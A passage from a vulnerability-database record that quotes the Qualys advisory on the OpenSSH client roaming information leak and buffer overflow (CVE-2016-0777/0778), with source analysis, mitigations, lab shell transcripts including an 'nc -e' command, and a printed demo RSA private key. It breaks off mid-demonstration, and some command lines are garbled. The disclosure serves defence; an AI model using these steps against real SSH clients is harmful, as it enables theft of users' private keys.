"https://nvd.nist.gov/vuln/detail/cve-2015-0477" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2625" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4803" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0477" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0491" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4840" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0491" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4729" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4872" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0486" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4843" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2664" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0484" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2625" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-2632" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2613" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4731" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-4883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2637" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3422" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3449" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0363" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0264" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7575" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0376" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0376" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8126" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-7575" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0483" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5041" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3443" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0363" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8540" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-7981" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8540" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0402" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0686" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3426" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5041" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3427" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0687" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7981" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0264" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0466" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-8472" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0494" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b37-1.13.9-1ubuntu0.12.04.1" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html#appendixjava" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-4893" }, { "db": "BID", "id": "77207" }, { "db": "JVNDB", "id": "JVNDB-2015-005479" }, { "db": "PACKETSTORM", "id": "134424" }, { "db": "PACKETSTORM", "id": "136182" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "134501" }, { "db": "PACKETSTORM", "id": "134620" }, { "db": "PACKETSTORM", "id": "134048" }, { "db": "PACKETSTORM", "id": "134499" }, { "db": "PACKETSTORM", "id": "134110" }, { "db": "NVD", "id": "CVE-2015-4893" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-4893" }, { "db": "BID", "id": "77207" }, { "db": "JVNDB", "id": "JVNDB-2015-005479" }, { "db": "PACKETSTORM", "id": "134424" }, { "db": "PACKETSTORM", "id": "136182" }, { "db": "PACKETSTORM", "id": "137932" }, { "db": "PACKETSTORM", "id": "134501" }, { "db": "PACKETSTORM", "id": "134620" }, { "db": "PACKETSTORM", "id": "134048" }, { "db": "PACKETSTORM", "id": "134499" }, { "db": "PACKETSTORM", "id": "134110" }, { "db": "NVD", "id": "CVE-2015-4893" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-10-21T00:00:00", "db": "VULMON", "id": "CVE-2015-4893" }, { "date": "2015-10-20T00:00:00", "db": "BID", "id": "77207" }, { "date": "2015-10-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-005479" }, { "date": "2015-11-19T02:21:35", "db": "PACKETSTORM", "id": "134424" }, { "date": "2016-03-14T14:43:36", "db": "PACKETSTORM", "id": "136182" }, { "date": "2016-07-18T19:51:43", "db": "PACKETSTORM", "id": "137932" }, { "date": "2015-11-23T17:29:36", "db": "PACKETSTORM", "id": "134501" }, { "date": "2015-12-03T14:47:53", "db": "PACKETSTORM", "id": "134620" }, { "date": "2015-10-23T02:39:27", "db": "PACKETSTORM", "id": "134048" }, { "date": "2015-11-23T17:28:30", "db": "PACKETSTORM", "id": "134499" }, { "date": "2015-10-28T18:46:55", "db": "PACKETSTORM", "id": "134110" }, { "date": "2015-10-21T23:59:53.997000", "db": "NVD", "id": "CVE-2015-4893" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-09-08T00:00:00", "db": "VULMON", "id": "CVE-2015-4893" }, { "date": "2016-10-26T05:02:00", "db": "BID", "id": "77207" }, { "date": "2016-08-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-005479" }, { "date": "2022-05-13T14:38:26.637000", "db": "NVD", "id": "CVE-2015-4893" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "77207" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Oracle Java Product In JAXP Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-005479" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "77207" } ], "trust": 0.3 } }
var-201601-0029
Vulnerability from variot
The resend_bytes function in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2 allows remote servers to obtain sensitive information from process memory by requesting transmission of an entire buffer, as demonstrated by reading a private key. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. Successfully exploiting this issue allows attackers to obtain sensitive information that may aid in further attacks. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. Qualys Security Advisory
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
======================================================================== Contents ========================================================================
Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept
======================================================================== Summary ========================================================================
Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.
The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.
All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.
======================================================================== Information Leak (CVE-2016-0777) ========================================================================
Analysis
If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:
63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }
40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }
The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:
198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }
In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:
-
"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
-
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
-
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.
In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:
-
Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
-
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
-
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).
Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.
Private Key Disclosure
We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:
-
the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
-
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
-
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().
However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):
(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)
-
If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
-
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
-
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.
Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk
-
In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
-
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
-
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.
For more information on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources
https://cwe.mitre.org/data/definitions/244.html
- An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).
OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().
Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:
https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations
https://cwe.mitre.org/data/definitions/14.html
https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506
Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").
- If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1
However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:
$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:
env ROAMING="scp_mode sleep:1" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection
-
Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
-
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
-
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.
In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).
-
In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
-
In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:
418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }
Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor
- The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:
1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));
$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015
$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes
- The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.
This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.
Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key
$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:1280" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-97ed9f59/infoleak
